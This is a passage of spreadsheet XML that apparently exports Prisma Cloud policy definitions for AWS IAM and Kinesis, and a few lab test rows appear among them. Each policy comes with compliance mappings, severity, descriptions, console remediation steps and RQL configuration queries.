        <v>0</v>
      </c>
      <c r="H19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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1972" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1972" t="inlineStr">
        <is>
          <t>eeeee</t>
        </is>
      </c>
      <c r="L1972" t="inlineStr"/>
      <c r="M1972" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1972" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1972" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1972" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1972" t="inlineStr"/>
      <c r="R1972" t="inlineStr"/>
      <c r="S1972" t="inlineStr">
        <is>
          <t>some_tag,new_label</t>
        </is>
      </c>
      <c r="T1972" t="b">
        <v>0</v>
      </c>
      <c r="U1972" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1972" t="inlineStr">
        <is>
          <t>aws-iam-list-users</t>
        </is>
      </c>
      <c r="W1972" t="inlineStr">
        <is>
          <t>eeee
JEC wuz here!</t>
        </is>
      </c>
      <c r="X1972" t="inlineStr"/>
      <c r="Y1972" t="inlineStr"/>
      <c r="Z1972" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.service = 'AWS IAM' and tag ( 'UserType' ) does not exist and resource.status = Active and api.name = 'aws-iam-list-users' AND json.rule = arn contains "arn"</t>
        </is>
      </c>
      <c r="AA1972" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1972" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1972" t="inlineStr"/>
      <c r="AD1972" t="b">
        <v>0</v>
      </c>
      <c r="AE1972" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1972" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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2" t="inlineStr">
        <is>
          <t>e75887ea-5cc6-40e5-a867-7b339f94e577</t>
        </is>
      </c>
      <c r="AI1972" t="inlineStr">
        <is>
          <t>62c3f834-5c0e-4ee9-9b29-8b18fbb9105a</t>
        </is>
      </c>
      <c r="AJ1972" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1972" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1973">
      <c r="A1973" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1973" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1973" s="2" t="inlineStr"/>
      <c r="D1973" t="inlineStr"/>
      <c r="E1973" t="inlineStr"/>
      <c r="F1973" t="inlineStr"/>
      <c r="G1973" t="b">
        <v>1</v>
      </c>
      <c r="H19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73" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1973" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1973" t="inlineStr">
        <is>
          <t>AWS IAM user is not a member of any IAM group</t>
        </is>
      </c>
      <c r="L1973" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1973" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1973" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1973" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1973" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1973" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R1973" t="inlineStr">
        <is>
          <t>IM-3</t>
        </is>
      </c>
      <c r="S1973" t="inlineStr"/>
      <c r="T1973" t="b">
        <v>0</v>
      </c>
      <c r="U1973" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1973" t="inlineStr">
        <is>
          <t>aws-iam-list-users</t>
        </is>
      </c>
      <c r="W1973" t="inlineStr">
        <is>
          <t>This policy identifies an AWS IAM user as not being a member of any IAM group.
It is generally a best practice to assign IAM users to at least one IAM group. If the IAM users are not in a group, it complicates permission management and auditing, increasing the risk of privilege mismanagement and security oversights. It also leads to higher operational overhead and potential non-compliance with security best practices.
It is recommended to ensure all IAM users are part of at least one IAM group according to your business requirement to simplify permission management, enforce consistent security policies, and reduce the risk of privilege mismanagement.</t>
        </is>
      </c>
      <c r="X1973" t="inlineStr">
        <is>
          <t>To add a user to an IAM user group (console)
1. Sign in to the AWS Management Console and open the IAM console at https://console.aws.amazon.com/iam/
2. In the navigation pane, choose 'Users' under the 'Access management' section and then choose the name of the user that is reported
3. Choose the 'Groups' tab and then choose 'Add user to groups'. 
4. Select the check box next to the groups under 'Group Name' according to your requirements.
5. Choose 'Add user to group(s)'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-that-all-iam-users-are-members-of-at-least-one-iam-group
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-that-all-iam-users-are-members-of-at-least-one-iam-group</t>
        </is>
      </c>
      <c r="Y1973" t="inlineStr"/>
      <c r="Z1973" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-users' AND json.rule = groupList is empty
{"category":"IAM","resourceTypes":["aws_iam_group_membership"]}</t>
        </is>
      </c>
      <c r="AA1973" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1973" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1973" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-1280-CKV2_AWS_21</t>
        </is>
      </c>
      <c r="AD1973" t="b">
        <v>1</v>
      </c>
      <c r="AE1973" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1973" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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73" t="inlineStr">
        <is>
          <t>44069bb1-0884-4cee-887f-40732c4e7b4e</t>
        </is>
      </c>
      <c r="AI1973" t="inlineStr">
        <is>
          <t>24e85db6-055c-4536-8886-7defaea8160b</t>
        </is>
      </c>
      <c r="AJ1973" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1973" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1974">
      <c r="A1974" t="inlineStr"/>
      <c r="B1974" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1974" s="2" t="inlineStr"/>
      <c r="D1974" t="inlineStr"/>
      <c r="E1974" t="inlineStr"/>
      <c r="F1974" t="inlineStr"/>
      <c r="G1974" t="b">
        <v>1</v>
      </c>
      <c r="H19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74" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1974" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1974" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to an AWS IAM User with a lateral movement finding to admin is displaying anomalous behavior</t>
        </is>
      </c>
      <c r="L1974" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M1974" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1974" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1974" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1974" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1974" t="inlineStr"/>
      <c r="R1974" t="inlineStr"/>
      <c r="S1974" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1974" t="b">
        <v>0</v>
      </c>
      <c r="U1974" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1974" t="inlineStr">
        <is>
          <t>aws-iam-list-users</t>
        </is>
      </c>
      <c r="W1974" t="inlineStr">
        <is>
          <t>This policy identifies unprivileged AWS IAM Users who have a lateral movement finding to admin and displaying anomalous behavior.
AWS IAM User assuming admin privileges pose a high security risk due to the extensive permissions and control granted to the administrator. With admin privileges, an individual or entity could potentially make unauthorized changes to critical resources, access sensitive data, and compromise the security of the entire environment. The anomalous behavior of an AWS IAM user indicates unauthorized access attempts, abnormal activity patterns, or potentially malicious actions within the AWS environment.
Immediate attention is required to investigate unusual user activities, grant only the least privileges required, and remove unwanted role assignments / permissions assigned to the IAM User as soon as possible.</t>
        </is>
      </c>
      <c r="X1974" t="inlineStr">
        <is>
          <t>[PERMISSION]
To remove any administrative permissions and minimize trusted entities that can assume the role, use the following remediation steps:
1. Browse to the privileged role ("Destination") in the AWS Console
2. Select "Trust relationships"-&gt;"Edit trust policy"
3. Modify the role's trust relationship as per requirements
4. Under the "Permissions" tab, select the relevant policy and remove unnecessary administrative permissions by either editing or replacing the policy.
(Notice: Editing a customer managed policy could affect other roles).
[ANOMALY]
1. Leverage Prisma Cloud user behavior analytics visualization on the Prisma Cloud platform to understand all the details related to this alert.
2. If it is determined through further investigation that the activity originated from a malicious insider or outsider, disable the user account until further investigation is done.</t>
        </is>
      </c>
      <c r="Y1974" t="inlineStr"/>
      <c r="Z1974" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-iam-list-users') and finding.name contains all ('Unprivileged user can assume a Service Account with admin privileges','Unusual user activity')</t>
        </is>
      </c>
      <c r="AA1974" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1974" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:28</t>
        </is>
      </c>
      <c r="AC1974" t="inlineStr"/>
      <c r="AD1974" t="b">
        <v>1</v>
      </c>
      <c r="AE1974" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1974" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG19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74" t="inlineStr">
        <is>
          <t>5bf62b53-31b1-479b-96bf-69af556d3043</t>
        </is>
      </c>
      <c r="AI1974" t="inlineStr">
        <is>
          <t>434d5ed2-628c-4e35-92f5-30b96d7223b7</t>
        </is>
      </c>
      <c r="AJ1974" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1974" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1975">
      <c r="A1975" t="inlineStr"/>
      <c r="B1975" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1975" s="2" t="inlineStr"/>
      <c r="D1975" t="inlineStr"/>
      <c r="E1975" t="inlineStr"/>
      <c r="F1975" t="inlineStr"/>
      <c r="G1975" t="b">
        <v>1</v>
      </c>
      <c r="H19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75" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1975" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1975" t="inlineStr">
        <is>
          <t>Brute force attack and privilege escalation risk to an AWS IAM User with high privileges and MFA disabled has excessive login failures</t>
        </is>
      </c>
      <c r="L1975" t="inlineStr">
        <is>
          <t>CREDENTIAL_ACCESS,MFA</t>
        </is>
      </c>
      <c r="M1975" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1975" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1975" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1975" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1975" t="inlineStr"/>
      <c r="R1975" t="inlineStr"/>
      <c r="S1975" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1975" t="b">
        <v>0</v>
      </c>
      <c r="U1975" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1975" t="inlineStr">
        <is>
          <t>aws-iam-list-users</t>
        </is>
      </c>
      <c r="W1975" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM Users who have high privileges assigned, Multi-Factor Authentication (MFA) disabled and have excessive login failures.
AWS IAM User assuming admin privileges and MFA disabled pose a high security risk due to the extensive permissions and control granted to the administrator. With admin privileges, an individual or entity could potentially make unauthorized changes to critical resources, access sensitive data, and compromise the security of the entire environment. The numerous unsuccessful login attempts by an AWS IAM user suggest unauthorized access efforts and may indicate potential brute-force login attempts originating from either the management console or the command line.
Immediate attention is required to investigate user excessive login failures, grant only the least privileges required, and remove unwanted role assignments / permissions assigned to the IAM User and enforce MFA which acts as additional authentication factor for each IAM user.</t>
        </is>
      </c>
      <c r="X1975" t="inlineStr">
        <is>
          <t>[[PERMISSION]
1. Sign in to the Cloud Console
2. Browse to the IAM service and search for the affected user
3. Examine the user's permissions as well as their role within your organization and determine whether the principle of least privilege is followed.
For remediation, use the following remediation steps:
If deemed unnecessary, remove permissions to minimize the user's access. Additionally, enforce MFA on the user. Upon their next login, the user will be prompted to enroll, activating their MFA method.
[ANOMALY]
1. Make sure that the enterprise user indeed made attempts to login to cloud account.
2. If the login failures did not originate from an authorized enterprise user, make sure there is strong password policy in place, including MFA, so that an unauthorized user cannot brute force their way into accessing your account.</t>
        </is>
      </c>
      <c r="Y1975" t="inlineStr"/>
      <c r="Z1975" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-iam-list-users') and finding.name contains all ('User account with high privileges and MFA disabled','Excessive login failures')</t>
        </is>
      </c>
      <c r="AA1975" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1975" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:28</t>
        </is>
      </c>
      <c r="AC1975" t="inlineStr"/>
      <c r="AD1975" t="b">
        <v>1</v>
      </c>
      <c r="AE1975" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1975" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG19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75" t="inlineStr">
        <is>
          <t>c95e8f30-240e-4ce7-a6c9-3b68fcf79445</t>
        </is>
      </c>
      <c r="AI1975" t="inlineStr">
        <is>
          <t>04ec4cfe-acdb-44f1-93b9-677e893fe6c6</t>
        </is>
      </c>
      <c r="AJ1975" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1975" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1976">
      <c r="A1976" t="inlineStr"/>
      <c r="B1976" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1976" s="2" t="inlineStr"/>
      <c r="D1976" t="inlineStr"/>
      <c r="E1976" t="inlineStr"/>
      <c r="F1976" t="inlineStr"/>
      <c r="G1976" t="b">
        <v>0</v>
      </c>
      <c r="H19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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1976" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1976" t="inlineStr">
        <is>
          <t>DM_TEST_2</t>
        </is>
      </c>
      <c r="L1976" t="inlineStr"/>
      <c r="M1976" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1976" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1976" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1976" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1976" t="inlineStr"/>
      <c r="R1976" t="inlineStr"/>
      <c r="S1976" t="inlineStr"/>
      <c r="T1976" t="b">
        <v>0</v>
      </c>
      <c r="U1976" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1976" t="inlineStr">
        <is>
          <t>aws-iam-saml-provider</t>
        </is>
      </c>
      <c r="W1976" t="inlineStr">
        <is>
          <t>IAM authentication is required as a multi-factor authentication</t>
        </is>
      </c>
      <c r="X1976" t="inlineStr"/>
      <c r="Y1976" t="inlineStr"/>
      <c r="Z1976" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-saml-provider' AND json.rule = arn does not exist</t>
        </is>
      </c>
      <c r="AA1976" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1976" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1976" t="inlineStr"/>
      <c r="AD1976" t="b">
        <v>0</v>
      </c>
      <c r="AE1976" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1976" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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6" t="inlineStr">
        <is>
          <t>1eb0793a-c9d5-437d-bbf6-15f4cec225e8</t>
        </is>
      </c>
      <c r="AI1976" t="inlineStr">
        <is>
          <t>a9b6d258-8b7b-4698-ba6f-51b751d42d3f</t>
        </is>
      </c>
      <c r="AJ1976" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1976" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1977">
      <c r="A1977" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, HITRUST CSF v.11.2.0, ISO/IEC 27002:2013, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, SOC 2, ITSG-33, ISO/IEC 27018:2019, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, Copy of CIS Controls v8, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, kfirdaus AWS Account-CS, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, CSA CCM v.4.0.1, AWS Well-Architected Framework, HITRUST CSF v.11.2.0, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, CSA CCM v.4.0.1, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1977" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1977" s="2" t="inlineStr"/>
      <c r="D1977" t="inlineStr"/>
      <c r="E1977" t="inlineStr"/>
      <c r="F1977" t="inlineStr"/>
      <c r="G1977" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1977" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1977" t="inlineStr">
        <is>
          <t>AWS IAM role/user with unused CloudTrail delete or full permission</t>
        </is>
      </c>
      <c r="L1977" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1977" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1977" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1977" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1977" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1977" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1977" t="inlineStr">
        <is>
          <t>ISM-1648</t>
        </is>
      </c>
      <c r="S1977" t="inlineStr"/>
      <c r="T1977" t="b">
        <v>0</v>
      </c>
      <c r="U1977" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1977" t="inlineStr">
        <is>
          <t>aws-iam-service-last-accessed-details</t>
        </is>
      </c>
      <c r="W1977" t="inlineStr">
        <is>
          <t>This policy identifies IAM roles/users that have unused CloudTrail delete permission or CloudTrail full permissions. As a security best practice, it is recommended to grant the least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions to a particular role/user. It helps to reduce the potential improper or unintended access to your critical CloudTrail infrastructure.</t>
        </is>
      </c>
      <c r="X1977" t="inlineStr">
        <is>
          <t>If Roles with unused CloudTrail delete permission,
1. Log in to AWS console
2. Navigate IAM service
3. Click on Roles
4. Click on reported IAM role
5. In the Permissions tab, Under the 'Permissions policies' section, Remove the policies which have CloudTrail permissions or Delete role if is not required.
If Users with unused CloudTrail delete permission,
1. Log in to AWS console
2. Navigate IAM service
3. Click on Users
4. Click on reported IAM user
5. In the Permissions tab, Under the 'Permissions policies' section, Remove the policies which have CloudTrail permissions or Delete user if is not required.</t>
        </is>
      </c>
      <c r="Y1977" t="inlineStr"/>
      <c r="Z1977" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-iam-service-last-accessed-details' AND json.rule = '(arn contains :role or arn contains :user) and serviceLastAccesses[?any(serviceNamespace contains cloudtrail and totalAuthenticatedEntities any equal 0)] exists' as X; config from cloud.resource where api.name = 'aws-iam-get-policy-version' AND json.rule = 'isAttached is true and (document.Statement[?any(Effect equals Allow and (Action[*] contains DeleteTrail or Action contains DeleteTrail or Action contains cloudtrail:* or Action[*] contains cloudtrail:*))] exists)' as Y; filter '($.Y.entities.policyRoles[*].roleName exists and $.X.arn contains $.Y.entities.policyRoles[*].roleName) or ($.Y.entities.policyUsers[*].userName exists and $.X.arn contains $.Y.entities.policyUsers[*].userName)'; show X;</t>
        </is>
      </c>
      <c r="AA1977" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1977" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1977" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-578</t>
        </is>
      </c>
      <c r="AD1977" t="b">
        <v>1</v>
      </c>
      <c r="AE1977" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1977" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>08f84034-fb56-4eb4-914f-bf1358d0d870</t>
        </is>
      </c>
      <c r="AI1977" t="inlineStr">
        <is>
          <t>dfa53590-1e74-45bc-ab47-9e5a32116fe7</t>
        </is>
      </c>
      <c r="AJ1977" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1977" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1978">
      <c r="A1978" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1978" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1978" s="2" t="inlineStr"/>
      <c r="D1978" t="inlineStr"/>
      <c r="E1978" t="inlineStr"/>
      <c r="F1978" t="inlineStr"/>
      <c r="G1978" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1978" t="inlineStr">
        <is>
          <t>aws-kinesis</t>
        </is>
      </c>
      <c r="K1978" t="inlineStr">
        <is>
          <t>AWS Kinesis Firehose with Direct PUT as source has SSE encryption disabled</t>
        </is>
      </c>
      <c r="L1978" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1978" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1978" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1978" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1978" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1978" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1978" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S1978" t="inlineStr"/>
      <c r="T1978" t="b">
        <v>0</v>
      </c>
      <c r="U1978" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1978" t="inlineStr">
        <is>
          <t>aws-kinesis-firehose-delivery-stream</t>
        </is>
      </c>
      <c r="W1978" t="inlineStr">
        <is>
          <t>This policy identifies Amazon Kinesis Firehose with Direct PUT as source which has Server-side encryption (SSE) encryption disabled. Enabling Server Side Encryption allows you to meet strict regulatory requirements and enhance the security of your data at rest. As a best practice, enable SSE for the Amazon Kinesis Firehose.</t>
        </is>
      </c>
      <c r="X1978" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console
2. Go to Amazon Kinesis Service
3. Click on 'Delivery streams'
4. Select the reported Kinesis Firehose for the corresponding region
5. Click on 'Configuration' tab
6. Under Server-side encryption, Click on Edit
7. Choose 'Enable server-side encryption for source records in delivery stream'
8. Under 'Encryption type' select 'Use AWS owned CMK'
9. Click 'Save changes'</t>
        </is>
      </c>
      <c r="Y1978" t="inlineStr"/>
      <c r="Z1978" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-kinesis-firehose-delivery-stream' AND json.rule = deliveryStreamEncryptionConfiguration exists and deliveryStreamEncryptionConfiguration.status equals DISABLED</t>
        </is>
      </c>
      <c r="AA1978" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1978" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1978" t="inlineStr">
        <is>
          <t>PC-AWS-KFH-909</t>
        </is>
      </c>
      <c r="AD1978" t="b">
        <v>1</v>
      </c>
      <c r="AE1978" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1978" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>69933f11-1001-4d77-81b5-f2b9ec29408a</t>
        </is>
      </c>
      <c r="AI1978" t="inlineStr">
        <is>
          <t>abc12a47-98f1-4d12-80ce-5c6e3dfb17e6</t>
        </is>
      </c>
      <c r="AJ1978" t="inlineStr">
        <is>
          <t>true</t>
